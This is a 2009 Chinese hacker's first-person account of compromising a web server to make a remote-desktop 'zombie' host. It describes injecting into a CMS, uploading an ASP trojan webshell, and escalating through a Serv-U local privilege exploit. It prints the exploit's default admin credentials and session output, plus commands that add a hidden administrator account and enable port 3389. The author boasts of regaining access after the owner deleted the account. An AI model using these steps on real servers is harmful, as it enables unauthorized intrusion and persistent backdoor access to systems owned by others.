打印本文 关闭窗口 | ||||
黑客:我的第一台3389肉鸡的经历 | ||||
作者:陈鹏 文章来源:eNet 点击数 更新时间:2009/9/11 23:15:14 文章录入:陈鹏 责任编辑:陈鹏 | ||||
|
||||
‘()’里面的全是以后知道的,做个注解吧! 菜鸟获取肉鸡,现在好象都是扫描4899。sa口令等,其实这样很不好,为什么呢?大家的网络都不是特别好,基本上扫不出肉鸡呵呵。我的第一个肉鸡不是扫描拿的,1.网络不行运气不行扫不到2.工具不对 我的第一个WEBSHELL,是天意程序注入漏洞,拿到的,后台广告编辑那里可以直接上传ASP木马(一个木马用了3天才学会如何操控WEBSHELL,第一个WEBSHELL拿到的时候,根本不知道提权是什么概念!放着没几天就丢了,呵呵。) 第2个WEBSHELL,也是天意注入```(那时候不容易啊,找了3天才找到第2个````中间碰到以后学到的MD5,==) 第2个WEBSHELL拿到了,就去网上各大黑客站点搜索:提权2个字`看了N个教程```用FTP。EXE和3389.EXE成功的开启了3389和创建管理员号!呵呵````(补充知识:其实管理员是用PCANYWHERE连接的,我不知道什么是PCANYWHERE就知道别人说什么3389肉鸡,我就当好人,给他开了3389呵呵。当时serv-u本地提权的漏洞还不是很普及,一般拿下webshell很容易成功,呵呵,cmd.exe和WScriptShell默认都可以调用,以后就难了,很多都是BT设置的主机!其实大家入侵的时候,用海洋木马比老兵要好,我感觉他调用命令,浏览文件好点) 我来演示下怎么serv-u本地提权 E:\qipei\cn\ftp.exe "net user 3800cc 3800cc /add"(意识就是以SERV-U本地管理的权限运行那个加用户的命令,SERV-U默认的SYSTEM权限哦!,加一个用户为3800cc密码3800cc的USER权限的用户,最下面220一般是成功的代表) USER LocalAdministrator PASS #l@$ak#.lk;0@P SITE MAINTENANCE ****************************************************** [+] Creating New Domain... USER haxorcitos PASS whitex0r <230 User logged in, proceed. ****************************************************** [+] Now Executing: net user 3800cc 3800cc /add <220 Domain deleted ****************************************************** 接下去几步没什么大不了, E:\qipei\cn\ftp.exe "net localgroup administrators 3800cc /add" (把3800cc这个用户加为管理员) 还有 E:\qipei\cn\ftp.exe "E:\qipei\cn\3389.exe" (运行E:\qipei\cn\3389.exe这个开3389的软件,假设已经开了,就不用运行了!直接连上!3389端口是可以修改的,海洋2006可以读取服务器相关数据 (系统参数,系统磁盘,站点文件夹,终端端口&自动登录)明白了吧!) 最后等待服务器重起,连上3389。这就是我的第一台肉鸡! 接下来第一台肉鸡陪了我有3个月``管理员其实很菜,删了我的号,我再到WEBSJELL里建立`来来往往```后来管理员真的疯了`一气之下,找了个高手修补了漏洞`我的第一个鸡就飞了```````
【责任编辑 徐洋】 |
||||
打印本文 关闭窗口 |